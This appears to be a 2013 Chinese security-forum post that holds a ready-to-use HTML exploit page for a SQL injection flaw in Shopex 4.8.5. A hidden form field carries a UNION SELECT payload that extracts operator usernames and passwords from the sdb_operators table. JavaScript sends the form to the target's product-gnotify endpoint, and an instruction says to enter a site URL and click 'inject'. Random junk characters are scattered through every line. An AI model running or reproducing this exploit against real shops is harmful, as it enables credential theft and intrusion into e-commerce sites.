<center>
. M) _$ q. `6 ?5 d0 y, e<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>% J# x$ z9 c; @' L4 W8 Q
<form action="" method="post" name="submit_url">
) L4 Y8 E$ `- w+ _ q; m. ~6 j0 r网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
: K; H* U1 w* v$ V R; ]<input type="hidden" name="goods[goods_id]" value="3">
( C; a% U' o9 T" v$ {1 i<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
B1 B) G) ?. R<input type="submit" value="给我注入" onclick=fsubmit()>
" @! J$ R& J' A" s! q5 b</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
& F8 ?$ ]3 I- U# ~& `& J- a2 s4 G$ E e8 P( _* [( ~' P" X6 f
<script> , t5 N1 c6 V. J3 g+ ~* b/ h. @
function fsubmit(){
/ c- Q- }+ e9 C1 v# r) rform = document.forms[0];
+ q/ q- @6 x, Z+ L9 m+ Oform.action = form.url.value+'/?product-gnotify'; 9 i3 N4 g4 d8 \3 x" ]3 y v; Q6 M
form.submit();
, A; ~2 G, A) J5 ]" q. @' {} 1 y# \, a1 Z. L' h3 A* h
</script>* s3 e/ q8 R% r) o7 f
|
发表于 2013-1-23 09:20:52
收藏
支持
反对